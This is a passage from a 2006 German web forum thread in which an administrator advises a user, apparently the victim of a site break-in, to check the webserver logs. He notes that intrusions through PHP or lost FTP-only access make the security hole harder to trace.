Zuletzt geändert von Snoopy am Do 12.Okt, 2006 23:25, insgesamt 1-mal geändert.
- Dungeonwatcher
- Beiträge: 1055
- Registriert: Sa 19.Feb, 2005 01:16
- Wohnort: Berlin
- Kontaktdaten:
- oxpus
- Administrator
- Beiträge: 28737
- Registriert: Mo 27.Jan, 2003 22:13
- Wohnort: Bad Wildungen
- Kontaktdaten:
Du musst in die Webserver-Logs schauen. Dort ist genau festgehalten, was wer macht.
Aber auch nur, solange er den Webserver selber verwendet hat.
Ist er über PHP oder einen anderen Dienst eingebrochen, wird es deutlich schwerer, die Lücke zu finden.
Aber auch nur, solange er den Webserver selber verwendet hat.
Ist er über PHP oder einen anderen Dienst eingebrochen, wird es deutlich schwerer, die Lücke zu finden.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
- oxpus
- Administrator
- Beiträge: 28737
- Registriert: Mo 27.Jan, 2003 22:13
- Wohnort: Bad Wildungen
- Kontaktdaten:
Auf dem FTP nur?
Dann wären die Logs auch weg...
Und somit keine Chance mehr, nachzuschauen, wo die Lücke gewesen sein könnte...
Dann wären die Logs auch weg...
Und somit keine Chance mehr, nachzuschauen, wo die Lücke gewesen sein könnte...
Zuletzt geändert von oxpus am Fr 13.Okt, 2006 09:53, insgesamt 1-mal geändert.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
- oxpus
- Administrator
- Beiträge: 28737
- Registriert: Mo 27.Jan, 2003 22:13
- Wohnort: Bad Wildungen
- Kontaktdaten:
Das normale Vorgehen.
Nun ja, hoffen wir, daß Du von einem solchen Unfall zukünftig verschont bleibst *daumendrück*
Nun ja, hoffen wir, daß Du von einem solchen Unfall zukünftig verschont bleibst *daumendrück*
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!